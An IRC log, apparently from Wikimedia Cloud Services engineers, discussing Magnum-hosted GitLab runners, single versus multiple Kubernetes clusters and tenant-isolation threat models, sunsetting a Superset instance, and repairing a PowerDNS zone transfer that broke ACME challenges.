[09:48:54] if you haven't spotted this already, releng managed to get gitlab runners working in magnum, with tofu provisioning! T403125 [09:48:55] T403125: Investigate WMCS Magnum for GitLab runners - https://phabricator.wikimedia.org/T403125 [10:15:48] I'm still not a fan of expanding Magnum usage with its current reliability [10:18:24] * volans was asking dh.inus about it in private :D [10:20:08] I think it's exciting to see that they managed to set it up, I'm also unsure whether it's going to cause us too many maintenance headaches [10:22:32] digitalocean usage seems quite limited judging by https://grafana.cloud.releng.team/dashboards [10:23:29] the bigger question is if non-k8s gitlab runners currently on wmcs should be moved to magnum or not [10:38:57] the even bigger question is: what is the recommended path if you need a new k8s cluster at WMF? and should it be managed by the tools-infra team? [10:41:47] 'at WMF' is a rather ambiguous term, I guess intentionally :D [10:43:15] * volans hides in the bushes, homer's style [10:49:42] taavi: yes I was aiming for the million-dollar question :D [12:14:23] dhinus: the unconference session was dropped from the SRE summit so we didn't really get to discuss that. We did have a brief poster session about k8s-as-a-service and I got the standard pushback of 'one cluster per service is bad, we should just have one giant cluster' which works for me but only if people are actually allowed to deploy on the one giant cluster... [12:46:15] tbh I think I'm crystalizing on one central question, which is whether we trust the isolation between deployment and workloads on a shared k8s cluster. If someone wants to talk me through that or link me to a book to read or something that'd be great because I keep flipping back and forth :( [12:47:36] define 'we' and 'workloads' [12:49:02] :D [12:49:16] So, I'm interested in the answer for all variations of that. [12:49:58] So, for instance, maybe a shared cluster is a good approach for prod because the deployers are presumed non-malicious, but a shared cluster is a bad approach for volunteers because not presumed non-malicious? [12:50:28] If that's true, then there's still a place in the world for per-cluster isolation but not necessarily in prod. (for example) [12:53:12] so obviously if you give two people full root access to a cluster, those two people can do anything with each other's workloads [12:53:53] sure [12:54:30] but you don't need root access to deploy a helm chart [12:55:12] so to share a cluster, you need to restrict what people can do within the cluster. and with those restrictions, there will now be things that people might want to run in those clusters but can't because of those restrictions [12:55:19] well, depends on the helm chart [12:56:28] ok [12:57:02] but, for example, for running pods, is it universally agreed that we /do/ trust the isolation between then? [12:57:13] or is that controversial? [12:57:52] again, there is no universal answer [12:58:05] lol ok [12:58:06] if you let people run any pods they can imagine, then no [12:58:29] since you could, like, run a pod as root and mount the host root filesystem in the container, at which point you have root on the host [12:58:35] sure [12:59:30] but with something like what we have on toolforge, with only images we manage, per-tool users and other options severely restricted as well, I have much more confidence in that [13:00:17] So, is the story something like "It is possible to run a secure paas on a single k8s cluster (like toolforge) but the production misc cluster will never be that because people want to deploy things in prod that are fundamentally un-isolatable and that's why we need more than one cluster"? [13:04:33] I maybe should have started with this question: "Why do we keep deploying new k8s clusters in prod rather than just having one big one per DC and using that as the basic undercloud for everything?" [13:04:55] I don't know the details about what runs in the the production misc cluster but I suspect things run in there (and not in toolforge) because they want to talk to services in the prod network realm [13:06:04] oh sorry, yes, I understand that the reason for a separate toolforge cluster is network separation. [13:06:23] But there seem to be quite a few clusters in the prod network space, and more to come. [13:06:57] When we proposed k8saas at the summit, many people asked the question "why would you need more k8s clusters" and my answer was just "I don't know but it seems like we do" [13:07:06] (k8saas in prod that is) [13:07:18] I would rather have a better answer than "I don't know" [13:09:36] sorry if i'm chasing you in circles taavi [13:12:08] at least I'm not aware of any plans for even more clusters in that realm.. so I'm not sure where that idea comes from [13:12:51] If that's true then that's a good answer :) [13:13:13] (that was what the never-happened unconference session was supposed to be about) [13:23:42] andrewbogott: ihmo something to note is that (at least currently) if there is something "weird" running in the wikiprod realm kubernetes clusters that needs to integrate with kubernetes itself, that thing is almost certainly owned by the same SRE team that owns the cluster itself, not something that the development teams building apps that run [13:23:42] inside the cluster have come up with. but in WMCS, the users building the apps also include a bunch of sre-type people that want to integrate with kubernetes directly or just otherwise don't like the restrictions and opinions that toolforge forces on them. [13:50:16] taavi: yep, that makes sense. [14:12:13] I totally understand the case for toolforge as it is. And I'm not being very clear in my questions because I'm thinking about multiple difference scenarios at the same time. [14:14:53] Among those things is the case for magnum. A few times I've suggested that we offer some kind of big shared k8s cluster for users who want to think in terms of (pods and helm) rather in terms of (toolforge api) and the answer to that (from other wmcs folks) has been "we can't have volunteers share a k8s cluster, each needs their own which is what magnum is for." [14:15:56] I assume what that really means is that (pods and helm) means a bunch of different things and to provide a /secure/ cluster we would be restricting the (pods and helm) to the point of uselessness [14:16:20] But then we also have some building consensus that magnum is a waste of time... [14:16:44] So I guess that means we're telling those users "get a VM and use k3s, you're on your own" which is maybe fine [14:17:54] a "big shared k8s cluster" is not something that can be discussed with concrete usecases, e.g. why that stuff that can't go in toolforge and why we're happy with them in this some other cluster but not in toolforge [14:21:13] Maybe they're deploying something that is already designed around a helm chart and they don't want to refactor it to use our API because that's work? [14:21:39] again, please can we have actual use cases and not hypotheticals [14:22:28] imho this is very much connected to the wider "cloud-vps use cases" analysis that cciufo is doing: what workloads do we have? who is responsible for them? what's the "best [14:22:34] I feel like this shouldn't be a new topic to you. We've often/frequently discussed the fact that the current toolforge design would result in shaking out exceptional cases that aren't right for toolforge and that we'd have to provide fallback options... [14:22:40] *"best" platform for running them? [14:22:52] If you think there are no such use cases that's great! But no one has ever suggested that in past discussions [14:27:08] taavi: you asking for specific cases is perfectly reasonable but I am also frustrated by how many things that I take as conventional wisdom are getting denied this week :) [14:45:10] what is magnum currently being used for? or is it not actually in use yet? [14:47:21] I would upgrade cloudcumin2001 to Bookworm tomorrow morning (https://phabricator.wikimedia.org/T403153), unless there's any objections about the time [14:55:15] moritzm: for sure it will need the cumin's hotpatch that is in place there re-added manually. I think it would also be nice to save cumin/cookbooks logs to restore them after the reimage. Dunno what the others think [15:00:45] I would upgrade these in-place like cumin2002, not reimage [15:01:08] but not sure which cumin hotpatch you mean? don't these run the stock cumin package? [15:01:13] ah got it, then I guess just the hotpatch but I can take care of it once upgraded [15:02:51] ok, sounds good. I'll drop a note here when I start and when I'm done [15:02:57] sounds good [15:02:58] thx [15:09:08] cciufo: it has at least 4 or 5 current users, I'll get you a list after this meeting [15:17:28] note to my fingers: the paws project bastion is not called pawstion [15:17:55] lol [15:49:22] cciufo: https://etherpad.wikimedia.org/p/magnumusersfeb2026 [15:55:04] I always do my best to present data as unpleasantly as possible [15:56:20] andrewbogott: actually I was thinking it might be worth copy/pasting that to wikitech :P (without the table maybe) [15:56:51] it's pretty dynamic... I guess ideally it would be an openstack-browser page [16:02:06] so we just have one volunteer use case [16:02:11] if I read that correctly [16:03:13] out of that table, procbot and qlever are not wmf-affiliated [16:04:49] sorry 2 [16:05:02] doesn't seem a critical mass ;) [16:08:01] indeed! [17:09:35] The beta cluster magnum cluster is a bare POC with no workloads. The zuul cluster right now is also empty of useful work. I think the superset cluster is on the way out right? [17:10:15] * taavi has no idea about the status about superset.wmcloud.org [17:10:26] Not having the k8s worker nodes be Puppet clients makes Magnum less useful for Beta Cluster than some other k8s solution that had ops/puppet integration would be. [17:11:44] "There was a Phabricator ticket to explore replacing Quarry with Superset's SQL Lab feature, but the ticket was declined." -- https://wikitech.wikimedia.org/wiki/Superset [17:12:34] To me that decision should have meant that we announced a sunset for superset.wmcloud.org. The whole point of the trial was to replace Quarry and that hypothesis failed. [17:12:48] i assume that's referring to https://phabricator.wikimedia.org/T169452 [17:13:05] T169452 [17:13:06] T169452: Replace Quarry with an installation of Superset - https://phabricator.wikimedia.org/T169452 [17:13:09] yeah [17:13:14] * taavi notes some recent activity on https://superset.wmcloud.org/dashboard/list/ [17:13:20] * taavi files yet another task [17:13:35] Oh I'm sure it is getting used. But it is also abandonware [17:16:12] I kind of paused my Magnum adoption work because I thought the backend was swapping out. [17:21:37] The 3 main things I have seen external folks talk about in the one big k8s cluster vs lots of k8s clusters debate are 1) tenant isolation, 2) geo distribution, and 3) maximum cluster size. [17:22:47] T416373 [17:22:48] T416373: Sunset superset.wmcloud.org - https://phabricator.wikimedia.org/T416373 [17:23:15] tenant isolation is both who has control of what is deployed and also workload security (do we trust container isolation) [17:24:45] geo distribution is sort of obvious maybe? Having a k8s cluster span data centers or regions is hard if for no other reason than speed of light. [17:25:18] max cluster size is that there are actually planned design limits on how big you can grow a single cluster -- https://kubernetes.io/docs/setup/best-practices/cluster-large/ [17:26:01] 5,000 nodes is like all of our hardware ever bought in 25 years at once. :) [17:30:40] andrewbogott: any guesses why ns1.openstack.codfw1dev.wikimediacloud.org is serving a REFUSED on TXT _acme-challenge.puppet-enc.cloudinfra-codfw1dev.codfw1dev.wmcloud.org? [17:32:34] I'm not sure, do you know how long it's been like that? [17:33:41] at least since 15 January, the logs I have don't go further than that [17:33:56] that 'tenant isolation' thing is a sore point for me because I keep getting told 'but k8s has that!' when I mention how our datacenter doesn't have tenant isolation. [17:34:22] taavi: it might be a side-effect of the upgrade to Trixie then. I can look but not for an hour or so. [17:34:38] ok, thanks, I'll see if I can fix it in the meantime somehow [17:35:33] It's very likely that I broke it [17:36:03] the last time I saw something like that it had to do with the list of permitted inbound IPs. [17:36:52] it seems like pdns just doesn't know about the zones? [17:37:17] mdns is trying but getting 'zone does not exist' errors back [17:46:35] andrewbogott: k8s RBAC provides some building blocks for tenant isolation, but it very much depends on the threat model if that is enough or if more is needed. Documenting the threat model is a hard starting point for these discussions. [17:48:54] The threat model used to build Toolforge has led us currently to restrict the images allowed, the capabilities allowed to the containers, and add validating and mutating admission controllers on top of a lot of RBAC rules. [17:49:20] with all of that we still have a more open cluster than the wikikube cluster in prod in my opinion [17:50:40] I keep wondering about the image restrictions in that I'm not sure that the original justification of owning the base layer to apply patches is being used effectively in our build system focused present. [17:51:42] that may not mean that it is a useless feature though. maybe I'm just not seeing it used or we are holding that ability in reserve [17:55:44] seems like pdns needed the dump-and-transfer thing on https://wikitech.wikimedia.org/wiki/Portal:Cloud_VPS/Admin/DNS/Designate#Initial_designate/pdns_node_setup [18:33:38] taavi: did I only do it on one node and not the other? Because almost nothing works until after that step and other things were working [18:34:14] that seems possible [18:34:44] the thing that broke was acme-chief, which specifically checks that both dns servers serve the expected results. resolvers should generally fail to the other server if one is serving REFUSEDs [18:36:28] did you do the transfer already or shall I? [18:42:03] I did [18:49:08] thx